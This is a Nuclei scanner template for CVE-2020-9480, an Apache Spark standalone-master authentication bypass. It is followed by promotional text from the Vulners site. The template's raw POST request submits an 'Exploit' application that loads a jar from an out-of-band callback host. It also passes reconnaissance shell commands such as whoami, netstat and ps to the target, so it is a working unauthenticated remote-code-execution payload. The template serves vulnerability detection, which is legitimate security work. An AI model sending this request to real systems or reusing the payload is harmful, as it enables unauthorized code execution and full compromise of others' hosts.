id: CVE-2020-9480
info:
name: Apache Spark - Authentication Bypass
author: riteshs4hu
severity: critical
description: |
In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc).
impact: |
Attackers can execute arbitrary shell commands on the host machine, leading to full system compromise.
remediation: |
Update to Spark 2.4.6 or later to fix the vulnerability.
reference:
- https://github.com/XiaoShaYu617/CVE-2020-9480/blob/main/20220624_apache_spark_apache_spark_pre-auth_code_execution_cve-2020-9480.py
- https://nvd.nist.gov/vuln/detail/cve-2020-9480
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-9480
epss-score: 0.29157
epss-percentile: 0.97933
cwe-id: CWE-306
metadata:
verified: true
max-request: 1
vendor: apache
product: spark
fofa-query: port="6066" && banner="Spark Master"
tags: cve,cve2020,apache,spark,auth-bypass,vkev,vuln
variables:
url: "http://{{interactsh-url}}/{{rand_text_alpha(5)}}.jar"
http:
- raw:
- |
POST /v1/submissions/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"action": "CreateSubmissionRequest",
"clientSparkVersion": "2.3.1",
"appArgs": ["whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"],
"appResource": "{{url}}",
"environmentVariables": {"SPARK_ENV_LOADED":"1"},
"mainClass": "Exploit",
"sparkProperties": {
"spark.jars": "{{url}}",
"spark.driver.supervise": "false",
"spark.app.name": "Exploit",
"spark.eventLog.enabled": "true",
"spark.submit.deployMode": "cluster",
"spark.master": "spark://{{Hostname}}:6066"
}
}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- "contains(interactsh_protocol, 'http')"
- 'contains(body, "CreateSubmissionResponse")'
- 'contains_any(body, "submissionId", "driverState")'
condition: and
extractors:
- type: regex
name: submission-id
regex:
- '"submissionId"\s*:\s*"([^"]+)"'
- '"driverState"\s*:\s*"([^"]+)"'
# digest: 490a00463044022009d4d6281511bdacb62d1a771d94923b987aca9a36925064ca0f6c6c0a4046ad022035e8f6de911325d8b4dc3bee027f63fb454dde6775e246d5a90ee448d73b6d35:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation